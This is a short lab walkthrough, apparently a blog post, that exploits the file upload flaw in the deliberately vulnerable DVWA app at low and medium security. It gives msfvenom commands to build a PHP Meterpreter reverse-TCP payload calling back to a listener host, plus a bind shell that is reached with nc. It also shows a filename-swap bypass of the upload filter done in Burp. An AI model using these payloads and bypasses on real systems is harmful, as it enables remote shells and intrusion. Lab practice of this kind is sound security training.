DVWA 1.9+: File Upload with Metasploit Venom

This article is about file upload as a security flaw. In previous articles we’ve setup our lab and made several exploitations against our target.

You can view those articles here.

File Upload — Low Security

Meterpreter

$ msfvenom -h

$ msfvenom -l payloads | grep php

View more info:

$ msfvenom -p php/meterpreter/reverse_tcp --list-options

$ msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.231.107 LPORT=4444 -o php_venom.php

Remove ‘/*’ from beginning of file.

Upload

Prepare MSF

Execute and

Shell

$ msfvenom -p php/bind_php — list-options

$ msfvenom -p php/bind_php LHOST=192.168.231.107 LPORT=4444 -o php_bind.php

remove ‘/*’ from file.

Execute

$ nc 192.168.231.110 4444

Got a shell

File Upload — Medium Security

Change DVWA Security to medium and try again.

$ cp php_venom.php php_venom.php.jpg

Try to run:

Let’s hack our file upload. Burp suite with Intercetp on

Return DVWA and upload file again. Go to Burp and change filename:

Then press Forward and get back to the Browser to see a success file upload. Go to hackable/upload and see php_venom.php updated. We’ve bypassed the medium security protection!

Conclusion

Again, with the help of tools we’ve hacked this target. In the next article we’ll keep at it using another vector of attack